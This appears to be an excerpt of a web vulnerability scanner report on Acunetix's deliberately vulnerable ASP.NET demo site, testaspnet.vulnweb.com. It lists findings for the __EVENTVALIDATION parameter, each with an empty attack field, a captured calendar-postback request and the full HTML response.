Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1149 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,149 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8277&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAAZUaitoIZGRkdly6qITFCqLBfRGIBSG6uh4safc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLAhr1lAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACxF%2FYVAT%2FVR9Ppi6k5x5%2FJFrs5AQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:51 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAAZUaitoIZGRkdly6qITFCqLBfRGIBSG6uh4safc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLAhr1lAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACxF/YVAT/VR9Ppi6k5x5/JFrs5AQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:White" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8460&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAmebnGdsIZGRk478HAAIgkI0zMsuIEhe5pH36GUQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLaveCpCALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJXv1ksI6eFxmolY93ZAQLs6ue6eg%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:16 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAmebnGdsIZGRk478HAAIgkI0zMsuIEhe5pH36GUQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLaveCpCALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJXv1ksI6eFxmolY93ZAQLs6ue6eg=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:White" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
